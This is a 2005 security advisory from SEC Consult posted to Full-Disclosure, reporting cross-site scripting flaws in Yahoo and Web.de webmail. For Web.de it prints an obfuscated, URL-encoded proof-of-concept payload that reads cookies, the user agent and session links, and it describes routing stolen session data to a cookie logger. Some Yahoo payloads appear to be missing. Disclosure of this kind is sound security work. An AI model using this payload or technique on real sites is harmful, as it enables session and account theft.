title: A Word on Webmail Security and Browser related XSS Bugs
program: Multiple Webmail Solutions
found: ---
by: SEC Consult Vulnerability Lab / www.sec-consult.com
affected vendors: Yahoo, Web.de
original adv.: http://www.sec-consult.com/234.html
================================================================================
As you all know, it is a tedious task to secure webmail services against
Cross Site Scripting attacks if they provide HTML email functionality.
Within the last few years a new type of XSS Attacks have emerged. The
combination of classic style XSS and incorrect HTML parsing of several
Webbrowsers (mostly MSIE) can lead to a dangerous situation for webmail
systems as well as other webapplications. Especially the insertion of
non printable characters like 0x00,0xff but also many others can be used
to trigger such combined vulnerabilities.
Many vendors implement blacklist filters or other security measures,
while the root of the problem remains untouched. SEC Consult has been in
touch with various webmail vendors for quite some time, trying to make
this point clear. However, the situation has not changed as the security
officers in charge do not show much interest in the matter. The tenor of
replies (if any) to our advisories is that this is not a security issue
or is impossible to exploit. Eventually, specific Cross Site Scripting
vectors will be quietly fixed, though, but it is a matter of minutes to
find a new one.
In this security information, we will address fixed and unfixed Cross
Site Scripting flaws of large scale webmail providers to add some proof
for our ongoing allegations.
OUR LATEST YAHOO ADVISORY:
Product: Yahoo Webmail in combination with MSIE 6.0(maybe other browsers)
Remarks: no other Versions tested but very likely vulnerable
Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan
Vendor: Yahoo
Vendor-Status: first time vendor contacted (2005.09)
Vendor-Patchs: patched in production environment
Object: MSIE (unknown version - 5.+)
Exploitable:
Local: —
Remote: YES
Type: XSS - Cross Site Scripting - Cookie/Account Theft
Yahoo-Webmail Vulnerability #8/2005
Followup for http://seclists.org/lists/bugtraq/2005/Oct/0263.html
Yahoos blacklists fail to detect script-tags in combination with
SPECIAL/META-Characters.
This leaves Webmail users using MSIE vulnerable to typical XSS /
Relogin-trojan attacks.
XML/DATASRC
XML-TAG / datasrc ATTRIBUTE:
We would like to apologize in advance for potential nonconformities
and/or known issues.
Do not use MS Internet-Explorer.
Do not use blacklists on tags and attributes. Whitelist
special/meta-characters.
vulnerability has been fixed in production environment.
… and in addition some examples taken from our Yahoo webmail XSS
Advisories from 2005.
… many more to come :)
Web.de is one of Germany's biggest webmail/freemail provider. Running
javascript HTML Mails can be done by trivial standard tricks, however,
web.de claims to be unexploitable due the security guards in place.
Firsty, session validation based on three variables, being the User-ID
Cookie, the useragent, and the random session ID which is passed along
in every URL. As a second security measure, HTML Mails are loaded into
their own frame from a different domain. This request is validated with
an encrypted one time token. Obviously, this makes it more difficult to
steal the main session ID, because the victim's browser prevents the
attacker's javascript code from cross domain scripting. Naturally, this
"protection" can be circumvented. In our proof of concept exploit, we
first extract the original domain from document.referer.We then use this
information to open the main website in an iframe and leverage one of
many other Cross Site Scripting flaws on web.de. This gives us access to
frame[0], where we can extract the session ID from any link. We then
extract the User-ID cookie and useragent by standard means and pass them
to our cookie logger, along with the session ID.
THE FIRST WEB.DE ADVISORY:
REMARK:
When we wrote the first advisory for web.de we thought it would be
necessary to use a combination - attack (Browser/XSS). After a while we
found out that you can achieve the same goals without using special/meta
characters.
Product: Web.de Freemail in combination with MSIE 6.0 (probably other
browsers)
Remarks: no other versions tested but very likely vulnerable
Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan
Vendor: Web.de (Part of United Internet)
Vendor-Status: first time vendor contacted (2005.08)
Vendor-Patchs: unpatched (Vendor does not consider XSS as a vulnerability)
Object: MSIE (unknown version - 5.+ / other Browsers maybe affected too)
Exploitable:
Local: —
Remote: YES
Type: XSS - Cross Site Scripting - Relogin Trojan - Cookie/Account Theft
Web.de is one of the largest freemail provider for the german speaking area.
Web.de - Webmail/Freemail Vulnerability #1/2005
Web.de s blacklists fail to detect script-tags in combination with
SPECIAL/META-Characters.This leaves Freemail users using MSIE (and most
likely many other browsers) vulnerable to typical XSS / Relogin-trojan
attacks. The people from web.de try to hide their authentication
tokens in another subdomain which is of course not a real measure of
security but much more "security by obfuscation". Even if this
precaution would prevent users from stealing session-ids and cookies it
would never be sufficient against relogin-trojan attacks!
MANY(most likely every one which can be used to inject java/vbscripts)
<h1>Milk is for babies. When you grow up you have to drink beer.</h1><br>
<img src="x.png" onerror="var
_x=document.referrer.substring(8,29);document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F')
+_x+unescape('%2F%68%6F%6D%65%2F%77%65%62%64%65%5F%66%72%65%65%6D%61%69%6C%2E%68%74%6D%3F%6D%63%3D%25%32%32%25%33%45%25%33%43
%69%6D%67%25%32%30%73%72%63%25%33%44%6E%6F%77%68%65%72%65%25%32%30%6F%6E%65%72%72%6F%72%25%33%44%25%32%32%76%61%72%25%32%30%75
%61%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%6E%61%76%69%67%61%74%6F%72%25%32%45%75%73%65%72%41%67%65%6E%74%25%32
%39%25%33%42%76%61%72%25%32%30%63%6B%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%64%6F%63%75%6D%65%6E%74%25%32%45%63
%6F%6F%6B%69%65%25%32%39%25%33%42%25%32%30%76%61%72%25%32%30%6C%6E%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%74%6F
%70%25%32%45%66%72%61%6D%65%73%25%35%42%30%25%35%44%25%32%45%64%6F%63%75%6D%65%6E%74%25%32%45%6C%69%6E%6B%73%25%35%42%31%25%35
%44%25%32%39%25%33%42%61%6C%65%72%74%25%32%38%25%32%37%25%32%41%25%32%41%25%32%41%25%32%30%6C%61%64%69%65%73%25%32%30%61%6E%64
%25%32%30%67%65%6E%74%6C%65%6D%61%6E%25%33%41%25%32%30%25%32%41%25%32%41%25%32%41%25%35%43%72%25%35%43%6E%25%32%37%25%32%42%75
%61%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32%42%63%6B%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32
%42%6C%6E%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32%39%25%33%42%25%32%32%25%33%45%25%33%43%6E%6F%73%63%72%69%70
%74%25%33%45%22%20%68%65%69%67%68%74%3D%31%20%77%69%64%74%68%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));"/>
We would like to apologize in advance for potential nonconformities
and/or known issues.
Do not use web.de s freemail.
Do not use blacklists on tags and attributes. Whitelist
special/meta-characters.
Vulnerability has not been fixed in production environment.
Remark regarding our disclosure policies:
Normally SEC-Consult's disclosure policy forbids making vulnerabilities
public before they are fixed.
In a couple of telephone calls, with a LETTER and many e-mails the
people from web.de could not be convinced that Cross Site Scripting is a
security vulnerability. Since it is not very likely that a fix will be
made available soon we would like to inform the users of web.de about
this serious issue.
You must employ whitelist filters. Meaning: Do not rely on filtering
"script", "javascript" and specific exploits. Deny HTML tags by default,
then allow the basic required tags and validate each of them. SEC
Consult and other security professionals will not hesitate to give you
free advice on how to implement this correctly.
We would like to apologize in advance for potential nonconformities
and/or known issues.
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com
EOF SEC Consult Vulnerability Lab / @2005
research at sec-consult dot com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/